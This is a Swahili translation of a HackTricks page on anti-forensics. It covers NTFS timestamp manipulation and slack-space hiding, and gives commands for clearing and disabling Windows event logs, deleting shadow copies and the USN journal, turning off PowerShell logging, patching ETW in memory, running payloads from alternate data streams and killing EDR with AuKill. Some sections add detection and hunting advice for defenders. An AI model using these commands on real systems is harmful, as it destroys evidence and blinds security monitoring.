Mbinu za Anti-Forensic
Tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na đŹ kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter đŚ @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Wakati
Mshambuliaji anaweza kuwa na hamu ya kubadilisha wakati wa faili ili kuepuka kugunduliwa.
Inawezekana kupata wakati ndani ya MFT katika sifa $STANDARD_INFORMATION __ na __ $FILE_NAME.
Sifa zote zina nyakati 4: Mabadiliko, ufikiaji, kuundwa, na mabadiliko ya rejista ya MFT (MACE au MACB).
Windows explorer na zana nyingine zinaonyesha taarifa kutoka $STANDARD_INFORMATION.
TimeStomp - Zana ya Anti-forensic
Zana hii inabadilisha taarifa za wakati ndani ya $STANDARD_INFORMATION lakini sio taarifa ndani ya $FILE_NAME. Hivyo, inawezekana kutambua shughuli za shaka.
Usnjrnl
USN Journal (Jarida la Nambari ya Mabadiliko) ni kipengele cha NTFS (mfumo wa faili wa Windows NT) kinachofuatilia mabadiliko ya kiasi. Zana ya UsnJrnl2Csv inaruhusu uchambuzi wa mabadiliko haya.
.png)
Picha ya awali ni matokeo yanayoonyeshwa na zana ambapo inaonekana kuwa baadhi ya mabadiliko yalifanywa kwa faili.
$LogFile
Mabadiliko yote ya metadata kwa mfumo wa faili yanarekodiwa katika mchakato unaojulikana kama kuandika kabla ya kuandika. Metadata iliyorekodiwa inahifadhiwa katika faili inayoitwa **$LogFile**, iliyoko katika saraka ya mzizi ya mfumo wa faili wa NTFS. Zana kama LogFileParser zinaweza kutumika kuchambua faili hii na kutambua mabadiliko.
.png)
Tena, katika matokeo ya zana inawezekana kuona kuwa baadhi ya mabadiliko yalifanywa.
Kwa kutumia zana hiyo hiyo inawezekana kutambua wakati ambao nyakati ziliporomoshwa:
.png)
- CTIME: Wakati wa kuundwa wa faili
- ATIME: Wakati wa mabadiliko ya faili
- MTIME: Mabadiliko ya rejista ya MFT ya faili
- RTIME: Wakati wa ufikiaji wa faili
Ulinganisho wa $STANDARD_INFORMATION na $FILE_NAME
Njia nyingine ya kutambua faili za shaka zilizobadilishwa ingekuwa kulinganisha wakati kwenye sifa zote mbili kutafuta mismatch.
Nanoseconds
Nyakati za NTFS zina usahihi wa nanosekondi 100. Hivyo, kupata faili zikiwa na nyakati kama 2010-10-10 10:10:00.000:0000 ni ya kushangaza sana.
SetMace - Zana ya Anti-forensic
Zana hii inaweza kubadilisha sifa zote mbili $STARNDAR_INFORMATION na $FILE_NAME. Hata hivyo, kuanzia Windows Vista, ni lazima kwa OS hai kubadilisha taarifa hii.
Kuficha Data
NFTS inatumia klasta na ukubwa wa habari wa chini. Hii inamaanisha kwamba ikiwa faili inachukua klasta na nusu, nusu iliyobaki haitatumika kamwe hadi faili itakapofutwa. Hivyo, inawezekana kuficha data katika nafasi hii ya slack.
Kuna zana kama slacker zinazoruhusu kuficha data katika nafasi hii âiliyojifichaâ. Hata hivyo, uchambuzi wa $logfile na $usnjrnl unaweza kuonyesha kuwa baadhi ya data iliongezwa:
.png)
Hivyo, inawezekana kurejesha nafasi ya slack kwa kutumia zana kama FTK Imager. Kumbuka kuwa aina hii ya zana inaweza kuhifadhi maudhui yaliyofichwa au hata yaliyosimbwa.
UsbKill
Hii ni zana ambayo it izima kompyuta ikiwa mabadiliko yoyote katika USB bandari yanagundulika.
Njia moja ya kugundua hii ingekuwa kuchunguza michakato inayoendesha na kurejea kila script ya python inayotembea.
Usambazaji wa Live Linux
Hizi distros zina tekelezwa ndani ya RAM kumbukumbu. Njia pekee ya kuzitambua ni ikiwa mfumo wa faili wa NTFS umewekwa na ruhusa za kuandika. Ikiwa umewekwa tu na ruhusa za kusoma haitakuwa rahisi kugundua uvamizi.
Kufuta Salama
https://github.com/Claudio-C/awesome-data-sanitization
Mipangilio ya Windows
Inawezekana kuzima mbinu kadhaa za kurekodi za windows ili kufanya uchunguzi wa forensics kuwa mgumu zaidi.
Zima Wakati - UserAssist
Hii ni funguo ya rejista inayohifadhi tarehe na saa wakati kila executable ilipokimbizwa na mtumiaji.
Kuzima UserAssist kunahitaji hatua mbili:
- Weka funguo mbili za rejista,
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackProgsnaHKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackEnabled, zote kuwa sifuri ili kuashiria kwamba tunataka UserAssist izimwe. - Futa subtrees zako za rejista zinazofanana na
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\<hash>.
Zima Wakati - Prefetch
Hii itahifadhi taarifa kuhusu programu zilizotekelezwa kwa lengo la kuboresha utendaji wa mfumo wa Windows. Hata hivyo, hii inaweza pia kuwa muhimu kwa mazoea ya forensics.
- Tekeleza
regedit - Chagua njia ya faili
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SessionManager\Memory Management\PrefetchParameters - Bonyeza kulia kwenye
EnablePrefetchernaEnableSuperfetch - Chagua Badilisha kwenye kila moja ya hizi kubadilisha thamani kutoka 1 (au 3) hadi 0
- Anzisha upya
Zima Wakati - Wakati wa Mwisho wa Ufikiaji
Wakati folder inafunguliwa kutoka kiasi cha NTFS kwenye seva ya Windows NT, mfumo unachukua wakati wa kupdate uwanja wa wakati kwenye kila folder iliyoorodheshwa, inayoitwa wakati wa mwisho wa ufikiaji. Katika kiasi cha NTFS kinachotumiwa sana, hii inaweza kuathiri utendaji.
- Fungua Mhariri wa Rejista (Regedit.exe).
- Tembelea
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem. - Tafuta
NtfsDisableLastAccessUpdate. Ikiwa haipo, ongeza hii DWORD na weka thamani yake kuwa 1, ambayo itazima mchakato. - Funga Mhariri wa Rejista, na upya seva.
Futa Historia ya USB
Makala yote ya USB Device Entries huhifadhiwa katika Rejista ya Windows Chini ya funguo ya USBSTOR ambayo ina funguo ndogo zinazoundwa kila wakati unapoingiza Kifaa cha USB kwenye PC au Laptop yako. Unaweza kupata funguo hii hapa HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR. Kufuta hii utafuta historia ya USB.
Unaweza pia kutumia zana USBDeview kuhakikisha umekifuta (na kufuta).
Faili nyingine inayohifadhi taarifa kuhusu USB ni faili setupapi.dev.log ndani ya C:\Windows\INF. Hii pia inapaswa kufutwa.
Zima Nakala za Kivuli
Orodha ya nakala za kivuli na vssadmin list shadowstorage
Futa hizo ukikimbia vssadmin delete shadow
Unaweza pia kuzifuta kupitia GUI ukifuatia hatua zilizopendekezwa katika https://www.ubackup.com/windows-10/how-to-delete-shadow-copies-windows-10-5740.html
Ili kuzima nakala za kivuli hatua kutoka hapa:
- Fungua programu za Huduma kwa kuandika âservicesâ kwenye kisanduku cha kutafuta maandiko baada ya kubonyeza kitufe cha kuanzisha cha Windows.
- Kutoka kwenye orodha, pata âVolume Shadow Copyâ, chagua, kisha upate Mali kwa kubonyeza kulia.
- Chagua Zime kutoka kwenye orodha ya âAina ya Kuanzishaâ, kisha thibitisha mabadiliko kwa kubonyeza Tumia na Sawa.
Pia inawezekana kubadilisha mipangilio ya faili zipi zitakazokopwa katika nakala ya kivuli katika rejista HKLM\SYSTEM\CurrentControlSet\Control\BackupRestore\FilesNotToSnapshot
Andika tena faili zilizofutwa
- Unaweza kutumia zana ya Windows:
cipher /w:CHii itamwambia cipher kuondoa data yoyote kutoka kwa nafasi isiyotumika ya diski ndani ya diski ya C. - Unaweza pia kutumia zana kama Eraser
Futa kumbukumbu za matukio ya Windows
- Windows + R â> eventvwr.msc â> Panua âKumbukumbu za Windowsâ â> Bonyeza kulia kila kikundi na chagua âFuta Kumbukumbuâ
for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }
Zima kumbukumbu za matukio ya Windows
reg add 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\eventlog' /v Start /t REG_DWORD /d 4 /f- Ndani ya sehemu za huduma zima huduma âWindows Event Logâ
WEvtUtil.exec clear-logauWEvtUtil.exe cl
Zima $UsnJrnl
fsutil usn deletejournal /d c:
Kurekodi na Kudanganya Alama za Juu (2023-2025)
Kurekodi ScriptBlock/Module ya PowerShell
Matoleo ya hivi karibuni ya Windows 10/11 na Windows Server yana vitu vya forensics vya PowerShell chini ya
Microsoft-Windows-PowerShell/Operational (matukio 4104/4105/4106).
Mshambuliaji anaweza kuzima au kufuta kwa haraka:
# Turn OFF ScriptBlock & Module logging (registry persistence)
New-ItemProperty -Path "HKLM:\\SOFTWARE\\Microsoft\\PowerShell\\3\\PowerShellEngine" \
-Name EnableScriptBlockLogging -Value 0 -PropertyType DWord -Force
New-ItemProperty -Path "HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ModuleLogging" \
-Name EnableModuleLogging -Value 0 -PropertyType DWord -Force
# In-memory wipe of recent PowerShell logs
Get-WinEvent -LogName 'Microsoft-Windows-PowerShell/Operational' |
Remove-WinEvent # requires admin & Win11 23H2+
Walinda wanapaswa kufuatilia mabadiliko kwenye funguo hizo za rejista na kuondolewa kwa wingi kwa matukio ya PowerShell.
ETW (Event Tracing for Windows) Patch
Bidhaa za usalama wa mwisho zinategemea sana ETW. Njia maarufu ya kuepuka mwaka wa 2024 ni kupachika ntdll!EtwEventWrite/EtwEventWriteFull kwenye kumbukumbu ili kila wito wa ETW urudishe STATUS_SUCCESS bila kutoa tukio:
// 0xC3 = RET on x64
unsigned char patch[1] = { 0xC3 };
WriteProcessMemory(GetCurrentProcess(),
GetProcAddress(GetModuleHandleA("ntdll.dll"), "EtwEventWrite"),
patch, sizeof(patch), NULL);
Public PoCs (e.g. EtwTiSwallow) implement the same primitive in PowerShell or C++.
Kwa sababu ya patch ni process-local, EDRs zinazotembea ndani ya michakato mingine zinaweza kukosa hiyo.
Uchunguzi: linganisha ntdll katika kumbukumbu dhidi ya kwenye diski, au hook kabla ya user-mode.
Ufuatiliaji wa Data Mbadala (ADS) Urejeleaji
Kampeni za malware mwaka wa 2023 (e.g. FIN12 loaders) zimeonekana zikifanya staging binaries za hatua ya pili ndani ya ADS ili kubaki nje ya mtazamo wa scanners za jadi:
rem Hide cobalt.bin inside an ADS of a PDF
type cobalt.bin > report.pdf:win32res.dll
rem Execute directly
wmic process call create "cmd /c report.pdf:win32res.dll"
Enumerate streams with dir /R, Get-Item -Stream *, or Sysinternals streams64.exe. Copying the host file to FAT/exFAT or via SMB will strip the hidden stream and can be used by investigators to recover the payload.
BYOVD & âAuKillâ (2023)
Bring-Your-Own-Vulnerable-Driver sasa inatumika mara kwa mara kwa anti-forensics katika uvamizi wa ransomware. Zana ya chanzo wazi AuKill inachukua dereva ulio saini lakini una udhaifu (procexp152.sys) ili kusimamisha au kumaliza EDR na sensorer za forensics kabla ya usimbaji na uharibifu wa kumbukumbu:
AuKill.exe -e "C:\\Program Files\\Windows Defender\\MsMpEng.exe"
AuKill.exe -k CrowdStrike
Driver inatolewa baadaye, ikiacha artefacts chache. Mikakati: wezesha orodha ya kuzuia madereva hatarishi ya Microsoft (HVCI/SAC), na onya juu ya uundaji wa huduma za kernel kutoka kwa njia zinazoweza kuandikwa na mtumiaji.
Linux Anti-Forensics: Kujipatia Kijisafisha na Cloud C2 (2023â2025)
Kujipatia Kijisafisha huduma zilizovunjwa ili kupunguza kugundulika (Linux)
Wadadisi wanajitahidi âkujipatia kijisafishaâ huduma mara tu baada ya kuikandamiza ili kuzuia tena kuikandamiza na kukandamiza kugundulika kwa msingi wa udhaifu. Wazo ni kubadilisha vipengele vyenye udhaifu na binaries/JARs halali za juu zaidi, ili skana ziweze kuripoti mwenyeji kama amepatiwa kijisafisha wakati uvumilivu na C2 vinabaki.
Mfano: Apache ActiveMQ OpenWire RCE (CVEâ2023â46604)
- Baada ya kuikandamiza, washambuliaji walipata JARs halali kutoka Maven Central (repo1.maven.org), wakafuta JARs zenye udhaifu katika usakinishaji wa ActiveMQ, na kuanzisha tena broker.
- Hii ilifunga RCE ya awali huku ikihifadhi maeneo mengine (cron, mabadiliko ya usanidi wa SSH, vipandikizi vya C2 tofauti).
Mfano wa operesheni (kuonyesha)
# ActiveMQ install root (adjust as needed)
AMQ_DIR=/opt/activemq
cd "$AMQ_DIR"/lib
# Fetch patched JARs from Maven Central (versions as appropriate)
curl -fsSL -O https://repo1.maven.org/maven2/org/apache/activemq/activemq-client/5.18.3/activemq-client-5.18.3.jar
curl -fsSL -O https://repo1.maven.org/maven2/org/apache/activemq/activemq-openwire-legacy/5.18.3/activemq-openwire-legacy-5.18.3.jar
# Remove vulnerable files and ensure the service uses the patched ones
rm -f activemq-client-5.18.2.jar activemq-openwire-legacy-5.18.2.jar || true
ln -sf activemq-client-5.18.3.jar activemq-client.jar
ln -sf activemq-openwire-legacy-5.18.3.jar activemq-openwire-legacy.jar
# Apply changes without removing persistence
systemctl restart activemq || service activemq restart
Forensic/hunting tips
- Kagua huduma za directories kwa ajili ya kubadilisha binary/JAR zisizopangwa:
- Debian/Ubuntu:
dpkg -V activemqna kulinganisha hash za faili/paths na repo mirrors. - RHEL/CentOS:
rpm -Va 'activemq*' - Tafuta toleo za JAR zilizopo kwenye diski ambazo hazimilikiwi na meneja wa pakiti, au viungo vya alama vilivyosasishwa nje ya muktadha.
- Timeline:
find "$AMQ_DIR" -type f -printf '%TY-%Tm-%Td %TH:%TM %p\n' | sortili kuhusisha ctime/mtime na dirisha la kuathiriwa. - Historia ya shell/telemetry ya mchakato: ushahidi wa
curl/wgetkwarepo1.maven.orgau CDNs nyingine za artefacts mara tu baada ya unyakuzi wa awali. - Usimamizi wa mabadiliko: thibitisha ni nani aliyeweka âpatchâ na kwa nini, si tu kwamba toleo lililosasishwa lipo.
Cloudâservice C2 with bearer tokens and antiâanalysis stagers
Uchunguzi wa biashara ulionyesha njia nyingi za C2 za muda mrefu na ufungaji wa kupambana na uchambuzi:
- Wasilishi wa PyInstaller ELF walio na nenosiri ili kuzuia sanduku la mchanga na uchambuzi wa statiki (mfano, PYZ iliyosimbwa, utoaji wa muda mfupi chini ya
/_MEI*). - Viashiria:
stringshits kamaPyInstaller,pyi-archive,PYZ-00.pyz,MEIPASS. - Artefacts za wakati wa kukimbia: utoaji kwa
/tmp/_MEI*au njia za--runtime-tmpdirza kawaida. - C2 inayotegemea Dropbox ikitumia tokens za OAuth Bearer zilizowekwa kwa nguvu
- Alama za mtandao:
api.dropboxapi.com/content.dropboxapi.comzikiwa naAuthorization: Bearer <token>. - Tafuta katika proxy/NetFlow/Zeek/Suricata kwa HTTPS ya nje kwa maeneo ya Dropbox kutoka kwa kazi za seva ambazo kawaida hazisawazishi faili.
- C2 ya sambamba/ya akiba kupitia tunneling (mfano, Cloudflare Tunnel
cloudflared), ikihifadhi udhibiti ikiwa channel moja imezuiwa. - IOCs za mwenyeji: michakato/units za
cloudflared, config katika~/.cloudflared/*.json, outbound 443 kwa Cloudflare edges.
Persistence and âhardening rollbackâ to maintain access (Linux examples)
Wavamizi mara nyingi huunganisha kujisahihisha na njia za ufikiaji zenye kudumu:
- Cron/Anacron: mabadiliko kwa stub ya
0anacronkatika kila/etc/cron.*/directory kwa ajili ya utekelezaji wa mara kwa mara. - Tafuta:
for d in /etc/cron.*; do [ -f "$d/0anacron" ] && stat -c '%n %y %s' "$d/0anacron"; done
grep -R --line-number -E 'curl|wget|python|/bin/sh' /etc/cron.*/* 2>/dev/null
- Kuimarisha kurejea kwa usanidi wa SSH: kuwezesha logins za root na kubadilisha shells za kawaida kwa akaunti zenye mamlaka ya chini.
- Tafuta kuwezesha logins za root:
grep -E '^\s*PermitRootLogin' /etc/ssh/sshd_config
# flag values kama "yes" au mipangilio ya kupitisha kupita kiasi
- Tafuta shells za mwingiliano zenye shaka kwenye akaunti za mfumo (mfano,
games):
awk -F: '($7 ~ /bin\/(sh|bash|zsh)/ && $1 ~ /^(games|lp|sync|shutdown|halt|mail|operator)$/) {print}' /etc/passwd
- Artefacts za beacon zenye majina mafupi ya bahati nasibu (herufi 8 za alfabeti) zilizotolewa kwenye diski ambazo pia zinawasiliana na C2 ya wingu:
- Tafuta:
find / -maxdepth 3 -type f -regextype posix-extended -regex '.*/[A-Za-z]{8}$' \
-exec stat -c '%n %s %y' {} \; 2>/dev/null | sort
Walinda wanapaswa kuhusisha artefacts hizi na kufichuliwa kwa nje na matukio ya kusasisha huduma ili kugundua kujirekebisha kwa kupambana na uchunguzi kutumika kuficha unyakuzi wa awali.
References
-
Sophos X-Ops â âAuKill: A Weaponized Vulnerable Driver for Disabling EDRâ (Machi 2023) https://news.sophos.com/en-us/2023/03/07/aukill-a-weaponized-vulnerable-driver-for-disabling-edr
-
Red Canary â âPatching EtwEventWrite for Stealth: Detection & Huntingâ (Juni 2024) https://redcanary.com/blog/etw-patching-detection
-
Red Canary â Patching for persistence: How DripDropper Linux malware moves through the cloud
Tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na đŹ kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter đŚ @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
HackTricks

